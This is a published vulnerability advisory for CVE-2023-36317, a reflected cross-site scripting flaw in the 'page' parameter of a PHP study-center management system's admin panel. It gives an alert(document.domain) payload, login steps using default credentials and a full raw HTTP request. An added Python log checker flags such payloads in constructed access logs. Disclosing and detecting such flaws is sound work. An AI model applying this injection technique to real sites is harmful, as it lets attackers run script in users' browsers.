CVE-2023-36317
# Exploit Title: Student Study Center Desk Management System - Cross-Site Scripting (XSS)
# Date: 17/06/2023
# Exploit Author: Ujjwal Saran
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code
# Version: V1.0.0
# Tested on: Windows
Payload used: %2f'%3balert(document.domain)%2f%2f
1. Visit http://localhost/php-sscdms/admin/login.php
2. Log in to the Admin Doctor account with the default credentials
3. Click left on the Students option
4. Put the XSS payload in the URL, in the "page" parameter
5. Capture the request and insert the payload
Request
GET /php-sscdms/admin/?page=%2f'%3balert(document.domain)%2f%2f HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/php-sscdms/admin/?page=assign
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=02kfvleeri3ami25pt1nk6mdlg
Connection: close
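
Added example (not part of the original advisory): a log check for the request above that flags `page` values under /php-sscdms/admin/ which are not plain route names. The sample log lines, the route-name pattern and the function name are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: legitimate "page" values are route names such as "assign"
# (seen in the Referer header above), optionally with "/"-separated parts.
SAFE_PAGE = re.compile(r"[A-Za-z0-9_\-]+(?:/[A-Za-z0-9_\-]+)*")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
ADMIN_PATH = "/php-sscdms/admin/"

# Constructed access-log lines (combined log format) for illustration only.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jun/2023:10:00:01 +0000] "GET /php-sscdms/admin/?page=assign HTTP/1.1" 200 5120
192.0.2.10 - - [17/Jun/2023:10:00:09 +0000] "GET /php-sscdms/admin/?page=%2f'%3balert(document.domain)%2f%2f HTTP/1.1" 200 5342
192.0.2.11 - - [17/Jun/2023:10:01:30 +0000] "GET /other-app/?page=<b>ignored</b> HTTP/1.1" 404 210
192.0.2.10 - - [17/Jun/2023:10:02:02 +0000] "GET /php-sscdms/admin/?page=students/list HTTP/1.1" 200 4800
""".splitlines()

def suspicious_page_values(log_lines):
    """Return (line_number, decoded_value) for non-route-name page values."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        url = urlsplit(match.group(1))
        if not url.path.startswith(ADMIN_PATH):
            continue  # only the admin panel is in scope here
        # parse_qsl percent-decodes each value once, as the server would
        for key, value in parse_qsl(url.query):
            if key == "page" and not SAFE_PAGE.fullmatch(value):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_page_values(SAMPLE_LOG):
        print(f"line {number}: unexpected page value {value!r}")
```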